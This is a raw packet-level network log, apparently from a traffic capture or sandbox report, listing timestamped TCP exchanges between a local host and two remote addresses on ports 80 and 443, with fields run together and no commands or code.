                                                            Dec 2, 2024 09:18:07.188880920 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.188951015 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.188982010 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.189023018 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.194470882 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.194529057 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.194578886 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.194634914 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.200372934 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.200442076 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.200458050 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.200490952 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.206228018 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.206302881 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.206412077 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.206459999 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.212121010 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.212182045 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.212223053 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.212272882 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.218018055 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.218082905 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.218177080 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.218220949 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.223839998 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.223901033 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.223948002 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.223989010 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.229696035 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.229756117 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.229805946 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.229845047 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.235611916 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.235672951 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.235738993 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.235774040 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.241483927 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.241534948 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.241611004 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.241650105 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.247361898 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.247423887 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.247463942 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.247493982 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.253232956 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.253304005 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.253339052 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.253374100 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.256915092 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.256969929 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.257025003 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.257071018 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.260608912 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.260672092 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.260699987 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.260739088 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.264312983 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.264377117 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.264404058 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.264445066 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.267952919 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.268045902 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.268074989 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.268120050 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.271631956 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.271689892 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.271769047 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.271811962 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.275326967 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.275388002 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.275422096 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.275461912 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.278604984 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.278661966 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.278750896 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.278793097 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.282033920 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.282095909 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.282133102 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.282181025 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.285182953 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.285244942 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.285279036 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.285317898 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.288398027 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.288451910 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.288484097 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.288523912 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.291529894 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.291588068 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.291615009 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.291656017 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.294687033 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.294743061 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.294820070 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.294866085 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:11.582866907 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:11.584664106 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:12.007431984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.007474899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:12.007613897 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.017652988 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.017673016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.559048891 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:13.618112087 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.618232012 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.627599955 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.627615929 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.627866983 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.648452044 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.695322037 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.008893967 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.008956909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.009007931 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.009021997 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.009416103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.030613899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.030625105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.030680895 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.030694962 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.084173918 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.177500010 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.177512884 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.177651882 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.177660942 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223033905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223066092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223092079 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.223099947 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223112106 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.245098114 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245105028 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245131969 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245291948 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.245300055 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266118050 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266125917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266149044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266176939 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.266186953 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266196966 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.281765938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281774044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281800985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281831980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.281841993 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281863928 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.334209919 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.381529093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381541014 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381573915 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381607056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.381656885 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.414329052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414335966 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414362907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414405107 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.414446115 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.430941105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.430948019 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.431009054 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.431016922 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443363905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443372011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443420887 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.443428993 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.455991030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.456000090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.456058025 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.456067085 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472513914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472521067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472598076 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.472605944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.484980106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.484987974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.485045910 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.485059977 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497580051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497591972 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497638941 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.497647047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.552920103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.585963011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.585973978 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.586031914 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.586040020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.586086035 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.612462044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612471104 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612503052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612536907 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.612564087 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.624171019 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.624180079 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.624267101 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.624274969 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632694960 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632703066 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632769108 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.632776976 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639391899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639400959 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639451981 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.639461040 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.644536018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.630345106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.630399942 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.630408049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.632864952 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.632940054 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.632946968 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.635510921 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.635579109 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.635585070 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.640464067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.640520096 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.640525103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.641685963 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.641740084 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.641746998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.644325972 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.644392014 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.644397974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.647363901 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.647433996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.647439957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.650769949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.650990963 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.650998116 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.653440952 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.653506994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.653512955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.682565928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.682642937 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.682648897 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.724842072 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.788907051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788914919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788957119 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788980961 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.789037943 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.816659927 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.816667080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.816739082 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.816757917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820018053 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820050955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820070982 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.820080996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820090055 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.822750092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.822817087 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.822824001 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.825582981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.825637102 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.825644016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.828736067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.828785896 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.828793049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.831511974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.831556082 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.831562996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.834820986 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.834878922 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.834886074 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.837436914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.837496996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.837503910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.840178967 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.840233088 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.840240002 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.843628883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.843683004 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.843691111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.846255064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.846328974 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.846333981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.849222898 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.849276066 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.849282980 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.851952076 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.852018118 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.852025032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.855292082 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.855344057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.855350971 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.884232998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.884305954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.884311914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.927937984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994895935 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994904041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994923115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994947910 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994987011 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994992018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018686056 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018693924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018737078 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.018745899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018769026 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.021290064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.021297932 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.021353960 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.021363020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024048090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024056911 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024106026 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.024113894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027420998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027458906 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027493000 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.027502060 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027525902 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.030194044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.030201912 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.030267954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.030277014 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032831907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032883883 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.032890081 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032917023 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.036130905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.036185980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.036192894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.039150953 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.039210081 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.039216042 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.041430950 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.041492939 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.041498899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.044842005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.044903994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.044910908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.047558069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.047616959 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.047624111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.050662041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.050721884 CET49733443192.168.2.4142.215.209.77
